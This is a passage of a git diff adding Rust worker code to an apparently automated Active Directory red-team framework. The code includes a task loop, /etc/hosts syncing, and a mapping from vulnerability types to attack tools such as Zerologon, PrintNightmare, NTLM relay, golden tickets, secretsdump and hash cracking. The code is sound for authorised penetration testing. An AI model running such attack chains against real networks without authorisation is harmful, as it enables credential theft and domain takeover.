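+//   {"status":"busy","current_task":"recon_ab12","pod_name":"ares-worker-0",
+//    "role":"recon","operation_id":"op-20260415-120000",
+//    "timestamp":"2026-04-15T12:00:00+00:00"}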
diff --git a/ares-cli/src/worker/hosts.rs b/ares-cli/src/worker/hosts.rs
new file mode 100644
index 00000000..c021f2ed
--- /dev/null
+++ b/ares-cli/src/worker/hosts.rs
@@ -0,0 +1,238 @@
+//! Background `/etc/hosts` management for AD hostname resolution.
+//!
+//! In Active Directory environments, Kerberos authentication requires hostname
+//! resolution. Workers need to resolve DC names and other AD hosts. This module
+//! periodically reads discovered hosts from Redis and appends new entries to
+//! `/etc/hosts`.
+//!
+//! For domain controllers, the bare domain name is also added as an alias to
+//! enable Kerberos realm resolution (e.g., `192.168.58.10 dc01.contoso.local dc01 contoso.local`).
+
+use std::collections::HashSet;
+use std::sync::Arc;
+use std::time::Duration;
+
+use redis::aio::ConnectionManager;
+use redis::AsyncCommands;
+use tracing::{debug, info, warn};
+
+use ares_core::models::Host;
+
+/// Interval between host sync cycles.
+const SYNC_INTERVAL: Duration = Duration::from_secs(30);
+
+/// Build the `/etc/hosts` entries for a list of discovered hosts.
+///
+/// Returns the formatted entry lines, skipping hosts whose IP is already in
+/// `already_written` (dedup tracking).
+pub fn build_host_entries(hosts: &[Host], already_written: &HashSet<String>) -> Vec<String> {
+    let mut entries = Vec::new();
+
+    for host in hosts {
+        if host.ip.is_empty() || host.hostname.is_empty() {
+            continue;
+        }
+        if already_written.contains(&host.ip) {
+            continue;
+        }
+
+        let hostname = host.hostname.to_lowercase();
+        let parts: Vec<&str> = hostname.split('.').collect();
+        let short_name = parts.first().copied().unwrap_or(&hostname);
+
+        // Build aliases: FQDN, short name, and bare domain for DCs
+        let mut aliases = vec![hostname.clone()];
+        if short_name != hostname {
+            aliases.push(short_name.to_string());
+        }
+
+        // For domain controllers, add bare domain for Kerberos realm resolution
+        if host.is_dc && parts.len() >= 2 {
+            let domain = parts[1..].join(".");
+            if !domain.is_empty() {
+                aliases.push(domain);
+            }
+        }
+
+        entries.push(format!("{} {}", host.ip, aliases.join(" ")));
+    }
+
+    entries
+}
+
+/// Write new host entries to `/etc/hosts`.
+///
+/// Appends entries in a single write to minimize race conditions.
+/// Returns the set of IPs that were successfully written.
+fn write_etc_hosts(entries: &[String], agent_name: &str) -> HashSet<String> {
+    use std::io::Write;
+
+    let mut written = HashSet::new();
+
+    if entries.is_empty() {
+        return written;
+    }
+
+    match std::fs::OpenOptions::new().append(true).open("/etc/hosts") {
+        Ok(mut f) => {
+            let mut buf = format!("\n# Ares discovered hosts ({agent_name})\n");
+            for entry in entries {
+                buf.push_str(entry);
+                buf.push('\n');
+                // Extract IP from "IP hostname ..." format
+                if let Some(ip) = entry.split_whitespace().next() {
+                    written.insert(ip.to_string());
+                }
+            }
+            if let Err(e) = f.write_all(buf.as_bytes()) {
+                warn!("Cannot write to /etc/hosts: {e}");
+                return HashSet::new();
+            }
+            info!(
+                count = entries.len(),
+                agent = agent_name,
+                "Updated /etc/hosts"
+            );
+            for entry in entries {
+                debug!("Added hosts entry: {entry}");
+            }
+        }
+        Err(e) => {
+            warn!("Cannot open /etc/hosts for append: {e}");
+        }
+    }
+
+    written
+}
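+
+// Example appended block (sketch; addresses illustrative, format matches
+// `write_etc_hosts` above and the tests below):
+//
+//   # Ares discovered hosts (ares-recon-agent)
+//   192.168.58.10 dc01.contoso.local dc01 contoso.local
+//   192.168.58.22 ws01.contoso.local ws01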
+
+/// Spawn a background task that periodically syncs hosts from Redis to `/etc/hosts`.
+///
+/// Requires an operation ID to know which Redis key to read from.
+/// Returns the join handle.
+pub fn spawn_hosts_sync(
+    conn: ConnectionManager,
+    operation_id: String,
+    agent_name: String,
+    shutdown: Arc<tokio::sync::Notify>,
+) -> tokio::task::JoinHandle<()> {
+    tokio::spawn(async move {
+        let mut conn = conn;
+        let mut written_ips: HashSet<String> = HashSet::new();
+
+        let hosts_key = format!("ares:op:{operation_id}:hosts");
+        info!(key = %hosts_key, "Starting /etc/hosts sync background task");
+
+        loop {
+            tokio::select! {
+                _ = tokio::time::sleep(SYNC_INTERVAL) => {}
+                _ = shutdown.notified() => {
+                    debug!("hosts_sync: shutdown signalled");
+                    return;
+                }
+            }
+
+            // Read hosts from Redis
+            let hosts_json: Vec<String> = match conn.lrange(&hosts_key, 0, -1).await {
+                Ok(h) => h,
+                Err(e) => {
+                    debug!("hosts_sync: Redis read failed: {e}");
+                    continue;
+                }
+            };
+
+            let hosts: Vec<Host> = hosts_json
+                .iter()
+                .filter_map(|json| serde_json::from_str(json).ok())
+                .collect();
+
+            let entries = build_host_entries(&hosts, &written_ips);
+            if !entries.is_empty() {
+                let newly_written = write_etc_hosts(&entries, &agent_name);
+                written_ips.extend(newly_written);
+            }
+        }
+    })
+}
+
+// ─── Tests ──────────────────────────────────────────────────────────────────
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host {
+        Host {
+            ip: ip.to_string(),
+            hostname: hostname.to_string(),
+            os: String::new(),
+            roles: Vec::new(),
+            services: Vec::new(),
+            is_dc,
+            owned: false,
+        }
+    }
+
+    #[test]
+    fn test_build_host_entries_basic() {
+        let hosts = vec![
+            make_host("192.168.58.10", "dc01.contoso.local", true),
+            make_host("192.168.58.22", "ws01.contoso.local", false),
+        ];
+        let entries = build_host_entries(&hosts, &HashSet::new());
+        assert_eq!(entries.len(), 2);
+        // DC entry should have FQDN, short name, and domain
+        assert_eq!(
+            entries[0],
+            "192.168.58.10 dc01.contoso.local dc01 contoso.local"
+        );
+        // Non-DC entry should have FQDN and short name only
+        assert_eq!(entries[1], "192.168.58.22 ws01.contoso.local ws01");
+    }
+
+    #[test]
+    fn test_build_host_entries_dedup() {
+        let hosts = vec![make_host("192.168.58.10", "dc01.contoso.local", true)];
+        let mut already_written = HashSet::new();
+        already_written.insert("192.168.58.10".to_string());
+        let entries = build_host_entries(&hosts, &already_written);
+        assert!(entries.is_empty()); // Already written
+    }
+
+    #[test]
+    fn test_build_host_entries_skip_incomplete() {
+        let hosts = vec![
+            make_host("", "dc01.contoso.local", true),
+            make_host("192.168.58.10", "", true),
+        ];
+        let entries = build_host_entries(&hosts, &HashSet::new());
+        assert!(entries.is_empty()); // Both missing required fields
+    }
+
+    #[test]
+    fn test_build_host_entries_short_hostname() {
+        let hosts = vec![make_host("192.168.58.99", "fileserver", false)];
+        let entries = build_host_entries(&hosts, &HashSet::new());
+        assert_eq!(entries.len(), 1);
+        // Short hostname without domain — no alias needed
+        assert_eq!(entries[0], "192.168.58.99 fileserver");
+    }
+
+    #[test]
+    fn test_build_host_entries_dc_subdomain() {
+        let hosts = vec![make_host("192.168.58.15", "dc02.north.contoso.local", true)];
+        let entries = build_host_entries(&hosts, &HashSet::new());
+        assert_eq!(entries.len(), 1);
+        assert_eq!(
+            entries[0],
+            "192.168.58.15 dc02.north.contoso.local dc02 north.contoso.local"
+        );
+    }
+
+    #[test]
+    fn test_build_host_entries_lowercase() {
+        let hosts = vec![make_host("192.168.58.10", "DC01.CONTOSO.LOCAL", true)];
+        let entries = build_host_entries(&hosts, &HashSet::new());
+        assert_eq!(entries.len(), 1);
+        assert!(entries[0].contains("dc01.contoso.local")); // Lowercased
+    }
+}
diff --git a/ares-cli/src/worker/mod.rs b/ares-cli/src/worker/mod.rs
new file mode 100644
index 00000000..8495a445
--- /dev/null
+++ b/ares-cli/src/worker/mod.rs
@@ -0,0 +1,156 @@
+//! Ares Worker — task consumption loop.
+//!
+//! 1. BLPOP from Redis queue (`ares:tasks:{role}`)
+//! 2. Execute agent tasks (native Rust tool execution)
+//! 3.
Push results back (`ares:results:{task_id}`) + +#[cfg(feature = "blue")] +mod blue_task_loop; +mod config; +mod heartbeat; +mod hosts; +mod task_loop; +mod tool_check; +mod tool_executor; + +use std::sync::Arc; + +use tracing::{error, info}; + +pub async fn run() -> anyhow::Result<()> { + // Initialize telemetry (console + OTLP when endpoint is configured) + let _telemetry = ares_core::telemetry::init_telemetry( + ares_core::telemetry::TelemetryConfig::new("ares-worker"), + ); + + // Parse config from environment + let config = config::WorkerConfig::from_env()?; + let mode_str = match config.mode { + config::WorkerMode::Task => "task", + config::WorkerMode::ToolExec => "tool_exec", + #[cfg(feature = "blue")] + config::WorkerMode::BlueTask => "blue_task", + }; + info!( + agent = %config.agent_name, + role = %config.worker_role, + mode = mode_str, + pod = %config.pod_name, + operation_id = ?config.operation_id, + task_timeout_secs = config.task_timeout.as_secs(), + "Ares worker starting" + ); + + // Single shared Redis connection — cloned cheaply to all subsystems + // Default response_timeout is 500ms which is too short for BRPOP + // blocking calls (5s+). Without this, the client-side timeout cancels + // the future but the server-side BRPOP remains, consuming queue items + // that get silently dropped. + let redis_client = redis::Client::open(config.redis_url.as_str())?; + let cm_config = redis::aio::ConnectionManagerConfig::new() + .set_response_timeout(Some(std::time::Duration::from_secs(30))); + let conn = redis_client + .get_connection_manager_with_config(cm_config) + .await?; + + // Shared shutdown signal + let shutdown = Arc::new(tokio::sync::Notify::new()); + let shutdown_signal = Arc::clone(&shutdown); + + // Spawn background heartbeat + let (_heartbeat_handle, status_tx) = heartbeat::spawn_heartbeat( + conn.clone(), + config.agent_name.clone(), + config.pod_name.clone(), + config.worker_role.clone(), + config.operation_id.clone(), + config.heartbeat_interval, + config.heartbeat_ttl, + Arc::clone(&shutdown), + ); + + // Check tool availability for this role and publish inventory + let inventory = tool_check::check_tools(&config.worker_role).await; + tool_check::publish_inventory(&mut conn.clone(), &config.agent_name, &inventory).await; + + // Spawn /etc/hosts sync if we have an operation ID + let _hosts_handle = config.operation_id.as_ref().map(|op_id| { + hosts::spawn_hosts_sync( + conn.clone(), + op_id.clone(), + config.agent_name.clone(), + Arc::clone(&shutdown), + ) + }); + + // Spawn SIGTERM/SIGINT handler + let shutdown_for_signal = Arc::clone(&shutdown_signal); + tokio::spawn(async move { + wait_for_shutdown_signal().await; + info!("Shutdown signal received, draining..."); + shutdown_for_signal.notify_waiters(); + }); + + // Run the appropriate loop based on worker mode + let result = match config.mode { + config::WorkerMode::Task => { + task_loop::run_task_loop(&config, conn, status_tx, shutdown_signal).await + } + config::WorkerMode::ToolExec => { + tool_executor::run_tool_exec_loop(&config, conn, status_tx, shutdown_signal).await + } + #[cfg(feature = "blue")] + config::WorkerMode::BlueTask => { + // Blue team mode requires an LLM provider + let model_spec = std::env::var("ARES_LLM_MODEL") + .unwrap_or_else(|_| "anthropic/claude-sonnet-4-20250514".to_string()); + let (provider, model_name) = match ares_llm::create_provider(&model_spec) { + Ok(p) => p, + Err(e) => { + error!("Failed to create LLM provider for blue worker: {e}"); + return Err(e); + } + }; + let dispatcher 
= std::sync::Arc::new(blue_task_loop::BlueLocalToolDispatcher::new()); + info!(model = %model_name, "Blue team worker using LLM"); + blue_task_loop::run_blue_task_loop( + &config, + conn, + provider, + dispatcher, + model_name, + status_tx, + shutdown_signal, + ) + .await + } + }; + + match &result { + Ok(()) => info!("Ares worker shut down cleanly"), + Err(e) => error!("Ares worker exited with error: {e}"), + } + + result +} + +/// Wait for SIGTERM or SIGINT (Ctrl-C). +async fn wait_for_shutdown_signal() { + #[cfg(unix)] + { + use tokio::signal::unix::{signal, SignalKind}; + let mut sigterm = signal(SignalKind::terminate()).expect("failed to register SIGTERM"); + let mut sigint = signal(SignalKind::interrupt()).expect("failed to register SIGINT"); + tokio::select! { + _ = sigterm.recv() => info!("Received SIGTERM"), + _ = sigint.recv() => info!("Received SIGINT"), + } + } + #[cfg(not(unix))] + { + tokio::signal::ctrl_c() + .await + .expect("failed to register Ctrl-C handler"); + info!("Received Ctrl-C"); + } +} diff --git a/ares-cli/src/worker/task_loop/executor.rs b/ares-cli/src/worker/task_loop/executor.rs new file mode 100644 index 00000000..c70ef0c5 --- /dev/null +++ b/ares-cli/src/worker/task_loop/executor.rs @@ -0,0 +1,415 @@ +//! Task execution — run_agent_task dispatches to ares-tools. +//! +//! The orchestrator submits high-level composite task types (e.g. "recon", +//! "credential_access") with a `technique`/`techniques` field in the payload. +//! This module expands those into individual tool calls that `ares_tools::dispatch` +//! understands, then parses the raw output into structured discoveries. + +use std::time::Duration; + +use serde_json::Value; +use tracing::{info, warn}; + +use super::types::AgentResult; + +/// Execute a tool natively in Rust via ares-tools. +/// +/// First attempts direct dispatch by `task_type`. If the task type is a +/// composite type (recon, credential_access, etc.), expands it into individual +/// tool calls based on the `technique`/`techniques` payload field. +/// +/// Tool outputs are parsed to extract structured discoveries (hosts, +/// credentials, hashes, vulnerabilities) that the orchestrator can consume. 
+pub async fn run_agent_task(
+    task_type: &str,
+    params: &serde_json::Value,
+    _timeout: Duration,
+) -> anyhow::Result<AgentResult> {
+    // Try expanding composite task types first
+    let tools = expand_task(task_type, params);
+
+    if tools.is_empty() {
+        // Direct tool dispatch (task_type IS the tool name)
+        info!(tool = task_type, "Executing tool natively");
+        let output = ares_tools::dispatch(task_type, params).await?;
+        let raw = output.combined_raw();
+        let discoveries = ares_tools::parsers::parse_tool_output(task_type, &raw, params);
+        return Ok(make_result_with_discoveries(output, discoveries));
+    }
+
+    // Run each expanded tool, collecting outputs and discoveries
+    let mut outputs = Vec::new();
+    let mut all_discoveries = Vec::new();
+    let mut any_error = false;
+
+    for (tool_name, tool_params) in &tools {
+        info!(tool = %tool_name, parent_task = task_type, "Executing expanded tool");
+        match ares_tools::dispatch(tool_name, tool_params).await {
+            Ok(output) => {
+                if !output.success {
+                    any_error = true;
+                }
+                let raw = output.combined_raw();
+                let combined = output.combined();
+                let disc = ares_tools::parsers::parse_tool_output(tool_name, &raw, tool_params);
+                all_discoveries.push(disc);
+                outputs.push(format!("=== {} ===\n{}", tool_name, combined));
+            }
+            Err(e) => {
+                warn!(tool = %tool_name, err = %e, "Expanded tool failed");
+                any_error = true;
+                outputs.push(format!("=== {} ===\nERROR: {}", tool_name, e));
+            }
+        }
+    }
+
+    let combined = outputs.join("\n\n");
+    let discoveries = ares_tools::parsers::merge_discoveries(&all_discoveries);
+    let error = if any_error {
+        Some("one or more tools had errors".to_string())
+    } else {
+        None
+    };
+
+    Ok(AgentResult {
+        output: combined,
+        error,
+        usage: None,
+        discoveries: Some(discoveries),
+    })
+}
+
+fn make_result_with_discoveries(output: ares_tools::ToolOutput, discoveries: Value) -> AgentResult {
+    let combined = output.combined();
+    let error = if output.success {
+        None
+    } else {
+        Some(format!("tool exited with code {:?}", output.exit_code))
+    };
+    AgentResult {
+        output: combined,
+        error,
+        usage: None,
+        discoveries: if discoveries.as_object().is_none_or(|o| o.is_empty()) {
+            None
+        } else {
+            Some(discoveries)
+        },
+    }
+}
+
+/// Expand a composite task type into individual (tool_name, params) pairs.
+///
+/// Returns an empty vec if the task_type is already a concrete tool name.
+fn expand_task(task_type: &str, params: &serde_json::Value) -> Vec<(String, serde_json::Value)> {
+    match task_type {
+        "recon" | "credential_access" | "privesc_enumeration" | "lateral_movement" | "coercion" => {
+            expand_technique_task(params)
+        }
+        "crack" => expand_crack_task(params),
+        "exploit" => expand_exploit_task(params),
+        // Already a concrete tool name — handled by direct dispatch
+        _ => Vec::new(),
+    }
+}
+
+/// Expand tasks that have `technique` (singular) or `techniques` (array) fields.
+fn expand_technique_task(params: &serde_json::Value) -> Vec<(String, serde_json::Value)> { + let mut tools = Vec::new(); + let normalized = normalize_params(params); + + // Handle singular "technique" field + if let Some(technique) = params.get("technique").and_then(|v| v.as_str()) { + let tool_name = map_technique_to_tool(technique); + tools.push((tool_name, normalized.clone())); + return tools; + } + + // Handle "techniques" array + if let Some(techniques) = params.get("techniques").and_then(|v| v.as_array()) { + for tech in techniques { + if let Some(name) = tech.as_str() { + let tool_name = map_technique_to_tool(name); + tools.push((tool_name, normalized.clone())); + } + } + } + + tools +} + +/// Normalize orchestrator payload field names to what ares-tools expects. +/// +/// The orchestrator sends `target_ip` but tools expect `target`. +/// Credential objects are flattened into top-level fields. +fn normalize_params(params: &serde_json::Value) -> serde_json::Value { + let mut p = params.clone(); + if let Some(obj) = p.as_object_mut() { + // target_ip → target (tools expect "target") + if !obj.contains_key("target") { + if let Some(ip) = obj.get("target_ip").cloned() { + obj.insert("target".to_string(), ip); + } + } + // Also set "targets" for tools that want it (smb_sweep) + if !obj.contains_key("targets") { + if let Some(ip) = obj.get("target_ip").cloned() { + obj.insert("targets".to_string(), ip); + } + } + // Flatten credential object into top-level fields + if let Some(cred) = obj.get("credential").cloned() { + if let Some(cred_obj) = cred.as_object() { + for (k, v) in cred_obj { + if !obj.contains_key(k) { + obj.insert(k.clone(), v.clone()); + } + } + } + } + } + p +} + +/// Map technique names (from orchestrator payloads) to ares-tools dispatch names. +fn map_technique_to_tool(technique: &str) -> String { + match technique { + // Recon technique → tool mappings + "network_scan" => "nmap_scan".to_string(), + "user_enumeration" => "enumerate_users".to_string(), + "share_enumeration" => "enumerate_shares".to_string(), + "smb_enumeration" => "smb_sweep".to_string(), + "bloodhound_collect" => "run_bloodhound".to_string(), + "trust_enumeration" => "enumerate_domain_trusts".to_string(), + + // Credential access technique → tool mappings + "share_spider" => "smbclient_spider".to_string(), + "asrep_roast" | "asrep" => "asrep_roast".to_string(), + + // Most technique names already match tool names 1:1 + other => other.to_string(), + } +} + +/// Expand crack tasks to the appropriate cracking tool. +fn expand_crack_task(params: &serde_json::Value) -> Vec<(String, serde_json::Value)> { + let normalized = normalize_params(params); + let tool = if params + .get("use_john") + .and_then(|v| v.as_bool()) + .unwrap_or(false) + { + "crack_with_john" + } else { + "crack_with_hashcat" + }; + vec![(tool.to_string(), normalized)] +} + +/// Expand exploit tasks based on vuln_type. 
+fn expand_exploit_task(params: &serde_json::Value) -> Vec<(String, serde_json::Value)> {
+    let vuln_type = params
+        .get("vuln_type")
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
+
+    let tool = match vuln_type {
+        "constrained_delegation" | "unconstrained_delegation" => "s4u_attack",
+        "esc1" | "adcs_esc1" => "certipy_request",
+        "esc4" | "adcs_esc4" => "certipy_esc4_full_chain",
+        "esc8" | "adcs_esc8" => "ntlmrelayx_to_adcs",
+        "krbtgt_hash" => "generate_golden_ticket",
+        "rbcd" => "rbcd_write",
+        "nopac" | "samaccountname" => "nopac",
+        "printnightmare" => "printnightmare",
+        "zerologon" => "zerologon_check",
+        "krbrelayup" => "krbrelayup",
+        "mssql_access" => "mssql_enum_impersonation",
+        _ => {
+            warn!(vuln_type, "No tool mapping for exploit vuln_type");
+            return Vec::new();
+        }
+    };
+
+    vec![(tool.to_string(), normalize_params(params))]
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use serde_json::json;
+
+    // --- normalize_params ---
+
+    #[test]
+    fn test_normalize_params_target_ip_to_target() {
+        let params = json!({"target_ip": "192.168.58.10"});
+        let norm = normalize_params(&params);
+        assert_eq!(norm["target"], "192.168.58.10");
+        assert_eq!(norm["targets"], "192.168.58.10");
+        // Original field preserved
+        assert_eq!(norm["target_ip"], "192.168.58.10");
+    }
+
+    #[test]
+    fn test_normalize_params_existing_target_not_overwritten() {
+        let params = json!({"target": "192.168.58.10", "target_ip": "192.168.58.20"});
+        let norm = normalize_params(&params);
+        assert_eq!(norm["target"], "192.168.58.10"); // not overwritten
+    }
+
+    #[test]
+    fn test_normalize_params_credential_flattening() {
+        let params = json!({
+            "target_ip": "192.168.58.10",
+            "credential": {
+                "username": "admin",
+                "password": "P@ss1",
+                "domain": "contoso.local"
+            }
+        });
+        let norm = normalize_params(&params);
+        assert_eq!(norm["username"], "admin");
+        assert_eq!(norm["password"], "P@ss1");
+        assert_eq!(norm["domain"], "contoso.local");
+    }
+
+    #[test]
+    fn test_normalize_params_existing_fields_not_overwritten_by_cred() {
+        let params = json!({
+            "domain": "fabrikam.local",
+            "credential": {
+                "domain": "contoso.local",
+                "username": "admin",
+                "password": "pass"
+            }
+        });
+        let norm = normalize_params(&params);
+        assert_eq!(norm["domain"], "fabrikam.local"); // not overwritten
+    }
+
+    // --- map_technique_to_tool ---
+
+    #[test]
+    fn test_map_technique_to_tool_mapped() {
+        assert_eq!(map_technique_to_tool("network_scan"), "nmap_scan");
+        assert_eq!(map_technique_to_tool("user_enumeration"), "enumerate_users");
+        assert_eq!(
+            map_technique_to_tool("share_enumeration"),
+            "enumerate_shares"
+        );
+        assert_eq!(map_technique_to_tool("smb_enumeration"), "smb_sweep");
+        assert_eq!(
+            map_technique_to_tool("bloodhound_collect"),
+            "run_bloodhound"
+        );
+        assert_eq!(
+            map_technique_to_tool("trust_enumeration"),
+            "enumerate_domain_trusts"
+        );
+        assert_eq!(map_technique_to_tool("share_spider"), "smbclient_spider");
+        assert_eq!(map_technique_to_tool("asrep_roast"), "asrep_roast");
+        assert_eq!(map_technique_to_tool("asrep"), "asrep_roast");
+    }
+
+    #[test]
+    fn test_map_technique_to_tool_passthrough() {
+        assert_eq!(map_technique_to_tool("nmap_scan"), "nmap_scan");
+        assert_eq!(map_technique_to_tool("secretsdump"), "secretsdump");
+        assert_eq!(map_technique_to_tool("kerberoast"), "kerberoast");
+    }
+
+    // --- expand_task ---
+
+    #[test]
+    fn test_expand_task_recon_with_techniques() {
+        let params = json!({"techniques": ["network_scan", "user_enumeration"], "target_ip": "192.168.58.10"});
+        let tools = expand_task("recon", &params);
+        assert_eq!(tools.len(), 2);
+        assert_eq!(tools[0].0, "nmap_scan");
+        assert_eq!(tools[1].0, "enumerate_users");
+        // Params should be normalized
+        assert_eq!(tools[0].1["target"], "192.168.58.10");
+    }
+
+    #[test]
+    fn test_expand_task_credential_access_single_technique() {
+        let params = json!({"technique": "secretsdump", "target_ip": "192.168.58.10"});
+        let tools = expand_task("credential_access", &params);
+        assert_eq!(tools.len(), 1);
+        assert_eq!(tools[0].0, "secretsdump");
+    }
+
+    #[test]
+    fn test_expand_task_concrete_tool_returns_empty() {
+        let params = json!({"target": "192.168.58.10"});
+        let tools = expand_task("nmap_scan", &params);
+        assert!(tools.is_empty());
+    }
+
+    // --- expand_crack_task ---
+
+    #[test]
+    fn test_expand_crack_task_default_hashcat() {
+        let params = json!({"hash_value": "abc123", "hash_type": "ntlm"});
+        let tools = expand_crack_task(&params);
+        assert_eq!(tools.len(), 1);
+        assert_eq!(tools[0].0, "crack_with_hashcat");
+    }
+
+    #[test]
+    fn test_expand_crack_task_john() {
+        let params = json!({"hash_value": "abc123", "use_john": true});
+        let tools = expand_crack_task(&params);
+        assert_eq!(tools[0].0, "crack_with_john");
+    }
+
+    // --- expand_exploit_task ---
+
+    #[test]
+    fn test_expand_exploit_delegation() {
+        let params = json!({"vuln_type": "constrained_delegation", "target_ip": "192.168.58.10"});
+        let tools = expand_exploit_task(&params);
+        assert_eq!(tools.len(), 1);
+        assert_eq!(tools[0].0, "s4u_attack");
+    }
+
+    #[test]
+    fn test_expand_exploit_adcs_variants() {
+        for (vuln_type, expected_tool) in &[
+            ("esc1", "certipy_request"),
+            ("adcs_esc1", "certipy_request"),
+            ("esc4", "certipy_esc4_full_chain"),
+            ("esc8", "ntlmrelayx_to_adcs"),
+        ] {
+            let params = json!({"vuln_type": vuln_type});
+            let tools = expand_exploit_task(&params);
+            assert_eq!(
+                tools[0].0, *expected_tool,
+                "Failed for vuln_type: {vuln_type}"
+            );
+        }
+    }
+
+    #[test]
+    fn test_expand_exploit_other_types() {
+        for (vuln_type, expected) in &[
+            ("krbtgt_hash", "generate_golden_ticket"),
+            ("rbcd", "rbcd_write"),
+            ("nopac", "nopac"),
+            ("zerologon", "zerologon_check"),
+            ("mssql_access", "mssql_enum_impersonation"),
+        ] {
+            let params = json!({"vuln_type": vuln_type});
+            let tools = expand_exploit_task(&params);
+            assert_eq!(tools[0].0, *expected, "Failed for vuln_type: {vuln_type}");
+        }
+    }
+
+    #[test]
+    fn test_expand_exploit_unknown_type_empty() {
+        let params = json!({"vuln_type": "unknown_vuln"});
+        let tools = expand_exploit_task(&params);
+        assert!(tools.is_empty());
+    }
+}
diff --git a/ares-cli/src/worker/task_loop/mod.rs b/ares-cli/src/worker/task_loop/mod.rs
new file mode 100644
index 00000000..129db781
--- /dev/null
+++ b/ares-cli/src/worker/task_loop/mod.rs
@@ -0,0 +1,236 @@
+//! Core task consumption loop.
+//!
+//! ```text
+//! loop {
+//!     1. BRPOP from ares:tasks:{role}
+//!     2. Deserialize TaskMessage
+//!     3. Update task status to "running"
+//!     4. Execute agent task (native Rust)
+//!     5. Parse result
+//!     6. Serialize TaskResult
+//!     7. LPUSH to ares:results:{task_id}
+//!     8. Update task status to "completed" or "failed"
+//!     9. Refresh heartbeat status
+//! }
+//! ```
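+//!
+//! A queued task looks roughly like this (sketch; values illustrative,
+//! shape matches `types::TaskMessage` and the tests below):
+//!
+//! ```text
+//! {"task_id":"recon_ab12","task_type":"recon","source_agent":"orchestrator",
+//!  "target_agent":"ares-recon-agent","priority":5,
+//!  "payload":{"technique":"network_scan","target_ip":"192.168.58.10"}}
+//! ```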
``` + +mod executor; +mod result_handler; +pub mod types; + +use types::TaskMessage; + +use std::sync::Arc; +use std::time::Duration; + +use tracing::{debug, error, info, warn}; + +use crate::worker::config::WorkerConfig; +use crate::worker::heartbeat::WorkerStatus; + +// ─── Redis key prefixes (must match Python's RedisTaskQueue) ───────────────── + +const TASK_QUEUE_PREFIX: &str = "ares:tasks"; +const RESULT_QUEUE_PREFIX: &str = "ares:results"; +const TASK_STATUS_PREFIX: &str = "ares:task_status"; + +/// TTL for task status keys — 24 hours, matches Python. +const TASK_STATUS_TTL: i64 = 60 * 60 * 24; + +/// TTL for result keys — 24 hours, matches Python's `RESULT_TTL`. +const RESULT_TTL: i64 = 60 * 60 * 24; + +// ─── Task loop ─────────────────────────────────────────────────────────────── + +/// Run the main task consumption loop until shutdown is signalled. +pub async fn run_task_loop( + config: &WorkerConfig, + conn: redis::aio::ConnectionManager, + status_tx: tokio::sync::watch::Sender, + shutdown: Arc, +) -> anyhow::Result<()> { + let queue_key = format!("{TASK_QUEUE_PREFIX}:{}", config.worker_role); + info!( + queue = %queue_key, + agent = %config.agent_name, + "Starting task loop" + ); + + let mut conn = conn; + + // Exponential backoff state for connection errors + let mut retry_delay = Duration::from_secs(1); + let max_retry_delay = Duration::from_secs(60); + + loop { + // Race BRPOP against shutdown signal + let poll_result = tokio::select! { + result = poll_task(&mut conn, &queue_key, config.poll_timeout) => result, + _ = shutdown.notified() => { + info!("Task loop: shutdown signalled, finishing"); + break; + } + }; + + match poll_result { + Ok(Some(task)) => { + // Reset backoff on successful poll + retry_delay = Duration::from_secs(1); + + // Update heartbeat status to busy + let _ = status_tx.send(WorkerStatus { + status: "busy".to_string(), + current_task: Some(task.task_id.clone()), + }); + + // Execute the task — runs to completion even if shutdown arrives mid-task + result_handler::process_task(&mut conn, config, &task).await; + + // Update heartbeat status back to idle + let _ = status_tx.send(WorkerStatus { + status: "idle".to_string(), + current_task: None, + }); + } + Ok(None) => { + // No task available (BRPOP timeout), just loop + retry_delay = Duration::from_secs(1); + } + Err(e) => { + let error_str = e.to_string().to_lowercase(); + let is_conn_error = [ + "connection", + "connect", + "closed", + "timeout", + "broken pipe", + "reset", + ] + .iter() + .any(|kw| error_str.contains(kw)); + + if is_conn_error { + // ConnectionManager auto-reconnects; just back off before retrying + warn!( + delay_secs = retry_delay.as_secs(), + "Task loop: connection error, retrying: {e}" + ); + tokio::select! { + _ = tokio::time::sleep(retry_delay) => {} + _ = shutdown.notified() => break, + } + retry_delay = (retry_delay * 2).min(max_retry_delay); + } else { + error!("Task loop: non-connection error: {e}"); + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(5)) => {} + _ = shutdown.notified() => break, + } + retry_delay = Duration::from_secs(1); + } + } + } + } + + Ok(()) +} + +/// BRPOP from the task queue with timeout. +/// Returns `Ok(None)` on timeout (no task available). 
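+///
+/// For reference, a queue entry is the JSON form of [`TaskMessage`]; a
+/// minimal sketch (all values illustrative):
+///
+/// ```text
+/// {"task_id": "t-1", "task_type": "recon", "source_agent": "orchestrator",
+///  "target_agent": "recon-0", "payload": {"target_ip": "192.168.58.10"}, "priority": 5}
+/// ```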
+async fn poll_task(
+    conn: &mut redis::aio::ConnectionManager,
+    queue_key: &str,
+    timeout: Duration,
+) -> anyhow::Result<Option<TaskMessage>> {
+    // BRPOP returns Option<(key, value)>
+    let result: Option<(String, String)> = redis::cmd("BRPOP")
+        .arg(queue_key)
+        .arg(timeout.as_secs() as i64)
+        .query_async(conn)
+        .await?;
+
+    match result {
+        Some((_key, data)) => {
+            let task: TaskMessage = serde_json::from_str(&data)?;
+            debug!(task_id = %task.task_id, task_type = %task.task_type, "Received task");
+            Ok(Some(task))
+        }
+        None => Ok(None),
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use types::TaskResult;
+
+    #[test]
+    fn task_message_roundtrip() {
+        let msg = TaskMessage {
+            task_id: "task-123".into(),
+            task_type: "recon".into(),
+            source_agent: "orchestrator".into(),
+            target_agent: "ares-recon-0".into(),
+            payload: serde_json::json!({"target_ip": "192.168.58.1"}),
+            priority: 3,
+            created_at: Some("2026-04-07T10:00:00Z".into()),
+            callback_queue: None,
+        };
+        let json = serde_json::to_string(&msg).unwrap();
+        let msg2: TaskMessage = serde_json::from_str(&json).unwrap();
+        assert_eq!(msg.task_id, msg2.task_id);
+        assert_eq!(msg.task_type, msg2.task_type);
+        assert_eq!(msg.priority, msg2.priority);
+    }
+
+    #[test]
+    fn task_message_default_priority() {
+        let json = r#"{
+            "task_id": "t1",
+            "task_type": "recon",
+            "source_agent": "orch",
+            "target_agent": "recon-0",
+            "payload": {}
+        }"#;
+        let msg: TaskMessage = serde_json::from_str(json).unwrap();
+        assert_eq!(msg.priority, 5); // default
+    }
+
+    #[test]
